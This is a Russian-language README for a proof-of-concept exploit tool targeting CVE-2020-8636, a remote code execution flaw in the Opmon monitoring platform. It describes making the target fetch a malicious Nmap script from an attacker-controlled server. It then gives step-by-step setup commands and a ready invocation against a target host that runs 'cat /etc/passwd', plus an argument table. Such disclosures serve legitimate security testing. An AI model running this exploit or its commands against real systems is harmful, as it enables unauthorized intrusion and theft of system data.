
CVE-2020-8636 эксплойт аутентифицированного удаленного выполнения кода для Opmon
О проекте • Установка • Использование • Лицензия
OpMonster — это proof-of-concept эксплойт для CVE-2020-8636, уязвимости удалённого
выполнения кода в платформе мониторинга Opmon. Он злоупотребляет конечной точкой
nettools.php, которая позволяет запускать Nmap с произвольными параметрами --script.
Эксплойт заставляет Opmon загрузить вредоносный .nse-скрипт Nmap с сервера, которым вы
управляете (через http-fetch), помещает его в /tmp, а затем запускает для выполнения вашей
команды на целевой системе и выводит результат.
Обнаружено и разработано @phor3nsic. Подробнее: Three CVEs on Opmon.
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests
Сначала запустите веб-сервер на хосте, доступном для целевой системы, в каталоге, откуда
можно загрузить сгенерированный .nse-скрипт (эксплойт записывает скрипт в текущий
каталог):
php -S 0.0.0.0:1337
Затем запустите эксплойт с четырьмя позиционными аргументами:
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
Эксплойт завершается с сообщением, если целевая система не загружает скрипт ("not vulnerable") или не может установить исходящее соединение с вашим сервером.
Только для авторизованного тестирования безопасности и образовательных целей. Вы несёте ответственность за то, как используете этот инструмент.
| Аргумент | Описание |
|---|
HOST | Базовый URL целевого Opmon (например, https://vulnhost.com) |
LHOST | Хост вашего сервера, который раздаёт .nse-скрипт |
LPORT | Порт вашего сервера |
CMD | Команда для выполнения на целевой системе |